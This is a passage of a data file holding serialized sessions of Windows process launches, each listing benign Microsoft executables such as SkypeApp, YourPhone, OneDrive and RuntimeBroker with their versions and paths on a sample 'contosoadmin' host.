'16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='msoia', params={'c:/program files/microsoft office/root/office16/msoia.exe', 'msoia', 'Microsoft Office', '16.0.12730.20144'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 